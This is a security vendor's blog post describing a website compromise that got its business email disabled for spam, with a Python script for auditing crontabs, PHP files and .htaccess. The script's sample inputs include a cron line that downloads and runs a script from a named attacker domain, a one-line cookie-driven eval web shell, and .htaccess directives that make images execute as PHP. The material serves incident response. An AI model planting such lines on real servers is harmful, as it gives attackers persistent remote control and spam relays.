22 Aug, 2022

Malware and How it Can Affect Your Business Emails

Business emails are an important aspect of every business's communication. But what happens when malware affects them? Read on!
There are many advantages to operating your own website. Chief among them is the ability to host business email addresses on your own domain through the same hosting account. It lends your organization credibility - your customers, partners, and stakeholders will regard you as a professional organization that takes electronic communication seriously. That's what makes it so damaging when cybersecurity problems like malware and outgoing spam cut off your access to those business email addresses.

This has the potential to disrupt the flow of your communication as well as your business's engagement with customers. If hackers or other malicious actors can disable your organization's email addresses with malware, it can impede information sharing and overall progress toward business goals.

We recently observed a situation in which a website owner we work with encountered a major problem with their business email addresses being disabled. This could have led to a catastrophic impact on their operations and bottom line, but we were able to assist them in dealing with it. Here's how we helped them handle it.

What Business Emails Mean to Your Organization
Before we dive deeper into this specific scenario about a company that had its business emails compromised, let's take a closer look at what your company's emails mean to your business.

For most companies, their business emails are what they use to communicate on a daily basis. They talk, collaborate, and otherwise share information through this channel.

Many communication channels fall in and out of popularity, but email remains in daily use at virtually every organization. Most of them do this not by asking their employees to use personal emails, but with a company-managed email account.

Businesses also use their company email addresses to communicate with customers as well. They'll reach out to existing customers who need assistance or information about a product or service they've purchased. They'll also reach out to prospective new customers to persuade them to buy from them.

When your business email addresses go down, it can impede your overall progress. An act as simple as one employee clicking on a spam or phishing link could send your company's digital communication into a tailspin, rendering your business emails useless until the problem is rectified.

If you operate a business website that hosts many email addresses (or even just one), then you can see how much of a problem this would be. This has the potential to shut down your business's ability to communicate both internally and externally. You can't talk to people from other departments. You can't connect with customers and clients. You'll find yourself at the mercy of your hosting provider.
The Problem and Solution
We received a message from a website owner telling us they had come across a serious obstacle. Their hosting provider disabled all email addresses they had created through their business website. This was due to spam activity.

So how did we help them?

The site owner signed up for ThreatSign!, Quttera's cybersecurity platform. They opened up a malware removal ticket. That's where our team got to work.

Using ThreatSign!, our malware research team did a thorough investigation into the hacked website. Our research concluded that the site contained multiple malicious mechanisms. These were distributing spam and, worst of all, continually infecting and reinfecting the site.
How the Hackers Did It
Luckily for this site owner, they partnered with ThreatSign! to remedy their problem before it became too severe. But for both them and others who want to avoid a similar fate, it's critical to understand the mechanics behind what the hackers did to infiltrate the system.

The attackers used the Linux crond service to run malicious cron jobs every 15-20 minutes. This scheduled reinfection is what made the problem persistent: cleaning the infected files without also removing the cron jobs would have left the site reinfected within the hour.
The first malicious cron job downloaded a shell script from hellodolly666[.]xyz, executed it, and deleted it as soon as it finished, leaving nothing on disk between runs. By the time we investigated, the URL was no longer serving the script, so we could not recover its contents. The danger of a script fetched this way is that it needs nothing more than the host's command-line mail tools to send spam or phishing emails from the site's own addresses.
The second malicious cron job recreated a malicious PHP file that acted as a web shell.
This web shell executed whatever shell commands the attacker supplied in an HTTP cookie value; cookies are not recorded in a standard web access log, so the commands left little trace. Once we had identified and removed the cron jobs, the spam activity stopped. That led us to conclude that both mechanisms were used together to send spam through the site's business email addresses: the cron jobs pulled fresh payloads from the attacker's server, and the web shell accepted commands pushed to it.
As we continued our investigation, we found .htaccess and index.php infectors. Their purpose was to reinfect several index.php files, giving the attackers continuous control over the website even after individual files had been cleaned.
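The three mechanisms described above (a download-execute-delete cron job, a cron job that rewrites a PHP file, and a web shell taking commands from a cookie) all leave patterns a responder can check for. The script below is an added example written for this article, not Quttera's tooling and not the actual artifacts from the incident. It audits a crontab for those two kinds of jobs, scans PHP sources for cookie- or request-controlled data reaching a code or command sink, and flags .htaccess directives commonly used to make rogue files execute as PHP (the specific directives checked are our assumption; the write-up does not say which ones were used). The crontab, PHP and .htaccess samples are constructed; only the domain is the one named above.

```python
"""Triage helpers for the cron/web-shell reinfection pattern. Added example; sample inputs are constructed."""
import re
from dataclasses import dataclass

CRON_FIELDS = 5
DOWNLOADER = re.compile(r"\b(?:wget|curl)\b")
REMOTE_URL = re.compile(r"https?://[^\s'\"]+")
# an interpreter invoked after a pipe or command chain: "... | sh", "... && php x"
EXEC_AFTER_CHAIN = re.compile(r"(?:\||&&|;)\s*(?:sh|bash|dash|php|perl|python3?)\b")
WRITES_PHP = re.compile(r">\s*\S+\.php\b")

PHP_SINKS = r"eval|assert|system|exec|shell_exec|passthru|popen|proc_open|create_function"
PHP_SOURCE = r"\$_(?:COOKIE|REQUEST|GET|POST)"
SINK_WITH_SOURCE = re.compile(r"\b(?:%s)\s*\([^;]*%s" % (PHP_SINKS, PHP_SOURCE))
TAINTED_ASSIGN = re.compile(r"(\$\w+)\s*=[^;]*%s" % PHP_SOURCE)

# directives that run a file before every request or make non-.php files execute as PHP
HTACCESS_BAD = re.compile(
    r"auto_(?:prepend|append)_file|(?:AddHandler|AddType|SetHandler)\s+\S*php", re.I)


@dataclass
class CronFinding:
    line: str
    reasons: list


def cron_minute_interval(minute_field):
    """Interval in minutes for '*' or '*/N' minute fields; None for anything else."""
    if minute_field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def audit_crontab(text):
    """Return findings for cron entries that fetch-and-run a remote script or rewrite a .php file."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, CRON_FIELDS)
        if len(parts) <= CRON_FIELDS:
            continue  # a VAR=value line or a malformed entry
        schedule, command = parts[:CRON_FIELDS], parts[CRON_FIELDS]
        reasons = []
        if DOWNLOADER.search(command) and REMOTE_URL.search(command) and EXEC_AFTER_CHAIN.search(command):
            reasons.append("downloads a remote script and runs it")
            if re.search(r"\brm\s+-[a-z]*f", command):
                reasons.append("deletes the payload after running, so nothing stays on disk")
        if WRITES_PHP.search(command):
            reasons.append("rewrites a .php file on every run (reinfector)")
        interval = cron_minute_interval(schedule[0])
        if reasons and interval is not None:
            reasons.append("runs every %d minute(s)" % interval)
        if reasons:
            findings.append(CronFinding(line, reasons))
    return findings


def scan_php(source):
    """Flag request-controlled data (cookie, query string, POST body) reaching a code/command sink."""
    reasons = []
    if SINK_WITH_SOURCE.search(source):
        reasons.append("request superglobal passed straight into a code/command sink")
    for var in sorted({m.group(1) for m in TAINTED_ASSIGN.finditer(source)}):
        if re.search(r"\b(?:%s)\s*\([^;]*%s\b" % (PHP_SINKS, re.escape(var)), source):
            reasons.append("%s is taken from a request superglobal and reaches a sink" % var)
    return reasons


def scan_htaccess(text):
    """Return .htaccess lines that prepend code to every request or change what runs as PHP."""
    return [l.strip() for l in text.splitlines() if HTACCESS_BAD.search(l)]


# Constructed samples; not the real cron lines, shell or .htaccess from the incident.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * wget -q -O /tmp/.x http://hellodolly666.xyz/s.sh && sh /tmp/.x && rm -f /tmp/.x
*/20 * * * * echo "$P" > /var/www/html/wp-content/uploads/.c.php
"""
SAMPLE_WEBSHELL = """<?php
$c = $_COOKIE['q'];
if (isset($c)) { @eval(base64_decode($c)); }
"""
SAMPLE_BENIGN_PHP = """<?php
$lang = $_COOKIE['lang'] ?? 'en';
echo htmlspecialchars($lang);
"""
SAMPLE_HTACCESS = """RewriteEngine On
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
AddHandler application/x-httpd-php .jpg
php_value auto_prepend_file /var/www/html/wp-content/uploads/.c.php
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print("CRON:", f.line, "->", "; ".join(f.reasons))
    print("WEBSHELL:", scan_php(SAMPLE_WEBSHELL))
    print("BENIGN:", scan_php(SAMPLE_BENIGN_PHP))
    print("HTACCESS:", scan_htaccess(SAMPLE_HTACCESS))
```

On a live host, feed `audit_crontab` the output of `crontab -l -u <web-user>` plus the contents of `/etc/cron.d/` and `/var/spool/cron/crontabs/`, and run `scan_php` over every `.php` file under the document root, not just `index.php`. The order matters: remove the cron jobs first, then clean the files, otherwise the next scheduled run undoes the cleanup.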
Unfortunately, it's a clever and potentially disastrous attack that can leave your business emails compromised indefinitely on a recurring basis. There is a solution you can enact to mitigate the risk you face, however.
How You Can Keep Your Business Emails Functioning Properly Without Being Compromised
Maintaining good cyber hygiene is the best method for combating spam and malware. The best way to do this is by partnering with a known, trusted provider of IT and cybersecurity services. By selecting the right platform for your business needs, you'll minimize the chances of a malware attack disrupting your business emails. You'll also keep your business communication flowing - whether it's internal communication between employees or external communication with customers and partners.

The platform you'll want to partner with is Quttera's ThreatSign! Monitoring your website files and establishing a Web Application Firewall (WAF) are a must to avoid such problems and the many other consequences of having your web assets hacked. ThreatSign! equips you with these capabilities, enabling you to maintain an equally effective proactive and reactive stance against cyber attacks. It will give you spam and malware protection for your websites.

ThreatSign! will regularly scan your systems to ensure that threats are noted and accounted for. Should you have any existing threats present, ThreatSign! can create an alert and help remedy the situation with minimal impact on your business operations.

Interested to hear more about how you can revolutionize your business's approach to cybersecurity? Contact us today.